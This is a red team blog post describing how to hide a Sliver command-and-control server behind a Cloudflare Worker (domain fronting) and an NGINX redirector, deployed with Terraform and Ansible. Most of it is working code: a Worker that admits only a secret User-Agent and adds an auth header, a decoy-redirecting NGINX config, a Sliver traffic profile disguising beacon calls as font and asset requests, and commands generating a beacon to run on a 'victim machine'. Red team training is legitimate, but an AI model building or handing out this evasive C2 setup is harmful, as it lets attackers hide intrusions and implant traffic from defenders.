# How to protect your C2 (or yes, another Red Team infrastructure blog)

By Mr.NOODLE
Published 2025-06-08

Hi everyone, it's been a while since my last blog post.

Now, I have more time and fewer excuses left to avoid writing blog posts.

For this blog post, we will explore something new for me: the world of Red Team infrastructure. I was strongly inspired by the excellent article from CGomezSec: Securing C2 for Red Team Operations using Cloudflare.

# Introduction

To protect our C2, it's essential to avoid exposing it directly to the internet. Instead, we need to place servers in front of it as a protective layer.

(So we don't end up on Fox_threatintel's Twitter)

Typical non-redirector protecting the Threat Actor infrastructure

There are two main techniques to achieve this:

  • Domain Fronting
  • A redirector (reverse proxy)

In this article, I'll show you how to set this up using a Cloudflare Worker for the Domain Fronting part and NGINX for the redirector part - all deployed and automated with Ansible & Terraform.

# Configuration part

# Cloudflare Worker (Domain Fronting)

The goal of Domain Fronting is to use a CDN (Content Delivery Network) that is highly trusted by the target or victim.

For example, in this project, I'm using Cloudflare Workers. Cloudflare is a widely known and trusted CDN - many legitimate websites rely on it. That makes it much harder to block at a network level without risking false positives.

Here, we'll use the CLI tool Wrangler to set up our Cloudflare Worker.

```shell
# Log in to Cloudflare
wrangler login
# Initialize a new Worker project
wrangler init rt-worker-infra
```

When you initialize the project, an instance is created right away, and you can access it directly via the provided link.

You should see a simple Hello World! by default:

Hello World Worker

To handle requests and control the behavior of the Worker, you need to edit the src/index.js file.

Here’s what it looks like after modification:

```javascript
const SECRET_HEADER_NAME = "X-Worker-Auth";
const SECRET_HEADER_VALUE = "REDACTED";

addEventListener("fetch", event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  const ua = request.headers.get("User-Agent") || "";

  const uniqueUA = "Mozilla/5.0 (Windows Nt 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0";
  // Check if the User-Agent matches the "secret" user-agent
  if (ua === uniqueUA) {
    // Extract only the path + query string
    const url = new URL(request.url);
    const pathAndQuery = url.pathname + url.search;

    // Build the new URL for the redirector
    const targetUrl = "https://cdn.blabla.net" + pathAndQuery;
    // Add the secret header to the request
    const headers = new Headers(request.headers);
    headers.set(SECRET_HEADER_NAME, SECRET_HEADER_VALUE);
    // Recreate the request with the correct URL
    const modifiedRequest = new Request(targetUrl, {
      method: request.method,
      headers: headers,
      body: request.body,
      redirect: "manual"
    });
    return fetch(modifiedRequest);
  }

  // If the User-Agent doesn't match, the client is redirected to Cloudflare's website.
  return Response.redirect("https://www.cloudflare.com", 302);
}
```
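To sanity-check this logic without deploying anything, the routing decision can be pulled out as a pure function. This is a sketch mirroring the Worker above, not production code; `cdn.blabla.net` is the placeholder redirector domain from the config:

```javascript
// Pure routing decision mirroring the Worker above: a matching User-Agent is
// forwarded to the redirector with path + query preserved; anything else
// (scanners, sandboxes, curious analysts) lands on the decoy redirect.
const UNIQUE_UA = "Mozilla/5.0 (Windows Nt 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0";
const REDIRECTOR = "https://cdn.blabla.net";
const DECOY = "https://www.cloudflare.com";

function routeRequest(userAgent, requestUrl) {
  if (userAgent === UNIQUE_UA) {
    const url = new URL(requestUrl);
    return { action: "proxy", target: REDIRECTOR + url.pathname + url.search };
  }
  return { action: "redirect", target: DECOY };
}

// Implant traffic (correct UA) is forwarded, path and query preserved:
console.log(routeRequest(UNIQUE_UA, "https://x.workers.dev/cdn-update/index.php?a=1"));
// Anything else gets bounced to the decoy:
console.log(routeRequest("curl/8.0", "https://x.workers.dev/cdn-update/"));
```

Note that the decision is based purely on the User-Agent string: anyone who discovers the exact UA can reach the redirector, which is why the secret header check on the NGINX side exists as a second layer.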

# Redirector Setup

The redirector's primary job is to proxy traffic between the internet and the C2. Think of it as a bodyguard - nothing gets to the C2 without going through it first.

There are many ways to build a redirector:

Different redirector type

In our case, we will use an NGINX server acting as a reverse proxy in front of our C2.

For our NGINX, we need to perform some checks on the request:

  1. All requests will hit the /cdn-update/ endpoint
  2. We need to check if the secret header added by the Worker is present in the request. If it is, we can proxy the request to our C2.
  3. If the condition is not met, the client will be redirected to Cloudflare's website.
NGINX configuration

```nginx
server {
    listen 80;
    server_name cdn.blabla.net;

    location /.well-known/acme-challenge/ {
        root /var/www/certbot;
    }

    location / {
        return 301 https://www.cloudflare.com$request_uri;
    }
}

server {
    listen 443 ssl;
    server_name cdn.blabla.net;

    ssl_certificate /etc/letsencrypt/live/cdn.blabla.net/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/cdn.blabla.net/privkey.pem;

    location /cdn-update/ {
        if ($http_x_worker_auth != "<REDACTED>") {
            return 301 https://www.cloudflare.com$request_uri;
        }
        proxy_pass http://{{ c2_ip }}:{{ c2_port }}/;
        proxy_set_header Host {{ c2_ip }};
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    location / {
        return 301 https://www.cloudflare.com$request_uri;
    }
}
```
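The checks in that configuration boil down to a two-condition gate, which can be condensed into a small decision function for reasoning about edge cases (a sketch; `REDACTED` stands in for the real secret value shared with the Worker):

```javascript
// Mirrors the NGINX gate: only /cdn-update/ requests carrying the Worker's
// secret header reach the C2; everything else gets the decoy redirect.
function redirectorDecision(path, workerAuthHeader) {
  const SECRET = "REDACTED"; // must equal the Worker's SECRET_HEADER_VALUE
  if (path.startsWith("/cdn-update/") && workerAuthHeader === SECRET) {
    return "proxy_to_c2";
  }
  return "redirect_to_decoy";
}

// A scanner probing the root without the header never sees the C2:
console.log(redirectorDecision("/", undefined));
// A Worker-forwarded implant request passes both checks:
console.log(redirectorDecision("/cdn-update/index.php", "REDACTED"));
```

The key point: even if someone finds the redirector's real IP and hits it directly, they fail the header check and get bounced to the decoy, so the C2 stays hidden behind both layers.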

Finally, here is a diagram of the full infrastructure:

C2 infrastructure

# Deployment

To simplify the deployment and configuration of both the Redirector and the C2, I used Terraform and Ansible.

  • Terraform handles the provisioning of the infrastructure on DigitalOcean.
  • Ansible takes care of configuring both the C2 and the Redirector.

Much of this infrastructure setup draws from xbz0n's detailed write-up on C2 redirectors. His article covers everything from layered redirector design to practical NGINX implementations.

# Why DigitalOcean ?

Because I'm broke and I had a free GitHub Education voucher to burn. (Moreover, I already had some experience with DO, and there's great documentation available on how to use Terraform with their platform.)

# Terraform

We will need two machines for this setup:

  • The C2 server (running SliverC2)
  • The Redirector server

However, there is a key constraint: The C2 must not be exposed to the internet - it should only be reachable locally, ideally via a private network (VPC) so it can communicate securely with the redirector.

vpc.tf

```hcl
resource "digitalocean_vpc" "local_infra" {
  name     = "red-team-local-fra1"
  region   = "fra1"
  ip_range = "10.11.0.0/16"
}
```

c2.tf

```hcl
resource "digitalocean_droplet" "c2" {
  name     = "c2"
  image    = "ubuntu-24-10-x64"
  region   = "fra1" # DigitalOcean region slugs are lowercase
  size     = "s-1vcpu-1gb"
  ssh_keys = [
    data.digitalocean_ssh_key.terraform.id
  ]
  vpc_uuid = digitalocean_vpc.local_infra.id
}
```

redirector.tf

```hcl
resource "digitalocean_droplet" "redirector" {
  name     = "redirector"
  image    = "ubuntu-24-10-x64"
  region   = "fra1"
  size     = "s-1vcpu-1gb"
  ssh_keys = [
    data.digitalocean_ssh_key.terraform.id
  ]
  vpc_uuid = digitalocean_vpc.local_infra.id
}
```
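The apply command used later passes two variables, `do_token` and `pvt_key`, and the droplets reference a `digitalocean_ssh_key` data source; none of those declarations are shown here. A minimal sketch of what they could look like (provider source and SSH key name are assumptions, not from the original setup):

```hcl
# variables.tf (assumed) - declarations for the values passed on the CLI
variable "do_token" {
  type      = string
  sensitive = true
}

variable "pvt_key" {
  type = string
}

# provider.tf (assumed)
terraform {
  required_providers {
    digitalocean = {
      source = "digitalocean/digitalocean"
    }
  }
}

provider "digitalocean" {
  token = var.do_token
}

# "terraform" is assumed to be the name the SSH key was uploaded under
# in the DigitalOcean control panel.
data "digitalocean_ssh_key" "terraform" {
  name = "terraform"
}
```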

Now that the machines are deployed, we need to retrieve the internal and external IP addresses of both the C2 and the Redirector. To do that, we can simply use the following output configuration in output.tf:

output.tf

```hcl
output "ansible_inventory" {
  value = <<EOT
[c2]
${digitalocean_droplet.c2.ipv4_address_private} ansible_user=root

[redirector]
${digitalocean_droplet.redirector.ipv4_address} ansible_user=root
EOT
}

output "droplet_ips" {
  value = {
    c2         = digitalocean_droplet.c2.ipv4_address_private
    redirector = digitalocean_droplet.redirector.ipv4_address_private
  }
}
```

Now that our Terraform files are ready, we can deploy the environment with the following command:

```shell
terraform apply -var "do_token=<YOUR_DIGITALOCEAN_TOKEN>" -var "pvt_key=/home/noodle/.ssh/terraform"
```

If everything goes well, you will get the following output:

Terraform output

# Ansible

Once our droplets are up, we move on to the configuration part.

As you may have noticed above, the output.tf file formats the Terraform output so you can directly copy & paste it into your Ansible inventory.ini file.
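For illustration, the pasted inventory.ini ends up looking something like this (the C2 address comes from the 10.11.0.0/16 VPC; 203.0.113.10 is a documentation placeholder, not a real redirector IP):

```ini
[c2]
10.11.0.3 ansible_user=root

[redirector]
203.0.113.10 ansible_user=root
```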

To check if Ansible is ready to communicate with all the droplets, we can run the following command:

```shell
ansible -i inventory.ini all -m ping
```

Ansible callback

# Redirector configuration

As you can see, Ansible supports Jinja2 templating. I used it to dynamically replace {{ c2_ip }} with the internal IP address of the C2 in the NGINX configuration file.
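As a rough illustration of that substitution (Ansible runs the full Jinja2 engine; this toy replacer only handles simple {{ var }} placeholders):

```javascript
// Toy stand-in for what Ansible's template module does with {{ var }}
// placeholders - not real Jinja2, just enough to show the idea.
function renderTemplate(tpl, vars) {
  return tpl.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name) => String(vars[name]));
}

// The proxy_pass line from the NGINX template, rendered with the playbook vars:
const line = "proxy_pass http://{{ c2_ip }}:{{ c2_port }}/;";
console.log(renderTemplate(line, { c2_ip: "10.11.0.3", c2_port: 80 }));
```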

```yaml
- name: Redirector configuration
  hosts: redirector
  become: true
  vars:
    c2_ip: "10.11.0.3"
    c2_port: 80
    redirector_domain: "cdn.blabla.net"
    cert_email: "random@example.com"
  tasks:
    - name: Update & Upgrade apt packages
      apt:
        upgrade: yes
        update_cache: yes

    - name: Install Nginx
      apt:
        name:
          - nginx
          - certbot
          - python3-certbot-nginx
        state: present

    - name: Deploy http-only Nginx configuration
      template:
        src: templates/nginx_redirector_http_only.conf.j2
        dest: /etc/nginx/sites-available/default
      notify: Restart Nginx

    - name: Obtain SSL certificate
      shell: >
        certbot --nginx -d {{ redirector_domain }} --non-interactive --agree-tos -m {{ cert_email }}
      args:
        creates: /etc/letsencrypt/live/{{ redirector_domain }}/fullchain.pem

    - name: Deploy final Nginx configuration
      template:
        src: templates/nginx_redirector.conf.j2
        dest: /etc/nginx/sites-available/default
      notify: Restart Nginx

    - name: Setup automatic certificate renewal
      cron:
        name: "Certbot renewal"
        job: "certbot renew --quiet --no-self-upgrade"
        special_time: daily

  handlers:
    - name: Restart Nginx
      service:
        name: nginx
        state: restarted
```

You can apply this configuration with the following command:

```shell
ansible-playbook -i inventory.ini playbook/redirector.yml
```

Ansible redirector

# C2 part

Here is the Ansible playbook used to deploy and configure Sliver:

c2.yml

```yaml
- name: "Sliver Installer"
  hosts: c2
  become: true
  vars:
    operator_name: "noodle"
    operator_lhost: "127.0.0.1"
  tasks:
    - name: Update and upgrade apt packages
      apt:
        upgrade: yes
        update_cache: yes
    - name: Install cURL
      apt:
        name: curl
        state: present
    - name: Download the SliverC2 install script
      get_url:
        url: https://sliver.sh/install
        dest: /tmp/sliver_install.sh
        mode: '0755'
    - name: Execute the installation script
      command: /tmp/sliver_install.sh
    - name: Create operator file
      command: >
        /root/sliver-server operator
        --name {{ operator_name }}
        --lhost {{ operator_lhost }}
        --save /root/{{ operator_name }}.cfg
    - name: Download the operator file
      ansible.builtin.fetch:
        src: /root/{{ operator_name }}.cfg
        dest: ./{{ operator_name }}.cfg
        flat: yes
    - name: Delete the operator file
      command: rm /root/{{ operator_name }}.cfg

    - name: Copy the HTTP C2 configuration
      copy:
        src: templates/http-c2.json
        dest: /root/.sliver/configs/http-c2.json
        owner: root
        group: root
        mode: '0644'
    - name: Start the Sliver server in daemon mode
      # `command` does not spawn a shell, so a trailing `&` would be passed
      # as a literal argument; async/poll already backgrounds the task.
      command: /root/sliver-server daemon
      async: 45
      poll: 0
```
Ansible C2
Ansible C2

Once the configuration is complete, we can use the downloaded .cfg operator file with the following command on your host:

```shell
mv noodle.cfg ~/.sliver-client/configs/
```

Since everything runs locally (from the C2's perspective), we just need to forward the port locally and connect as usual:

```shell
ssh -L 31337:127.0.0.1:31337 root@C2_IP -i ~/.ssh/terraform
```

Sliver in local

But here is the tricky part: we now need to make Sliver understand how our infra actually works. By default, it will try to make requests to the C2 - but our setup requires it to first pass through the Cloudflare Worker checks, then through the redirector.

Me when i want to test my payload

After a fair bit of trial and error, I found out that we just need to provide Sliver with a proper http-c2.json profile. This profile defines the required path, the secret header added by the Worker, and the custom User-Agent expected.

Here is what that config looks like:

http-c2.json

```json
{
  "implant_config": {
    "user_agent": "Mozilla/5.0 (Windows Nt 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0",
    "chrome_base_version": 100,
    "macos_version": "10_15_7",
    "url_parameters": null,
    "headers": [],
    "max_files": 8,
    "min_files": 2,
    "max_paths": 8,
    "min_paths": 2,
    "stager_file_ext": ".woff",
    "stager_files": [
      "attribute_text_w01_regular",
      "ZillaSlab-Regular.subset.bbc33fb47cf6",
      "ZillaSlab-Bold.subset.e96c15f68c68",
      "Inter-Regular",
      "Inter-Medium"
    ],
    "stager_paths": [
      "static",
      "assets",
      "fonts",
      "locales"
    ],
    "poll_file_ext": ".js",
    "poll_files": ["index"],
    "poll_paths": ["cdn-update"],
    "start_session_file_ext": ".html",
    "session_file_ext": ".php",
    "session_files": ["index"],
    "session_paths": ["cdn-update"],
    "close_file_ext": ".png",
    "close_files": ["favicon"],
    "close_paths": ["assets"]
  },
  "server_config": {
    "random_version_headers": false,
    "headers": [],
    "cookies": [
      "PHPSESSID",
      "SID",
      "SSID",
      "APISID",
      "csrf-state",
      "AWSALBCORS"
    ]
  }
}
```
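To see why this profile keeps implant traffic exactly where the Worker and NGINX expect it, here is a simplified sketch (not Sliver's actual code) of how a session URL is assembled from `session_paths`, `session_files`, and `session_file_ext`:

```javascript
// Simplified sketch of URL assembly from the http-c2.json fields above.
// Sliver picks paths/files randomly; we take the first entry for illustration.
function sessionUrl(base, paths, files, ext) {
  return `${base}/${paths[0]}/${files[0]}${ext}`;
}

// With session_paths=["cdn-update"], session_files=["index"] and ext=".php",
// every session request falls under /cdn-update/ - exactly the prefix
// the redirector's location block matches.
console.log(sessionUrl("https://cdn.blabla.net", ["cdn-update"], ["index"], ".php"));
```

Since both `poll_paths` and `session_paths` contain only `cdn-update`, no beacon request can ever land outside the gated location block.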

# Proof of Concept (PoC)

Now that everything is up and running, let's generate a listener and a beacon to verify it works end-to-end.

# Beacon generation

```shell
# Listener
sliver> http -L <IP_LOCAL_C2> --lport 80 --domain cdn.blabla.net
sliver> generate beacon --debug --http http://<REDACTED>-cloudflare.workers.dev/cdn-update --skip-symbols --disable-sgn --os linux --arch amd64
```

Now, execute the beacon on the victim machine, and check if the session connects properly:

Sliver beacon
Sliver sessions

Sliver factz

# Conclusion

This project was a small experiment for me to understand how to securely deploy a Red Team C2 infrastructure - and I definitely learned a lot along the way.

That said, I'm still a beginner in this area, and this setup is far from perfect.

The goal wasn't to build a bulletproof production setup, but rather to get hands-on and explore the fundamentals.

After some reflection and feedback, I think it could be interesting to open source this project on GitHub and keep improving it with new features. So stay tuned, more to come 👀

If you have any feedback, questions, or suggestions, I'm all ears.

Feel free to reach out. I'm always happy to learn from others.

# Special thanks

  • Euz / NtDallas / Atsika (and all the others who will recognize themselves 👀) for helping me with some questions and proofreading this article

# Resources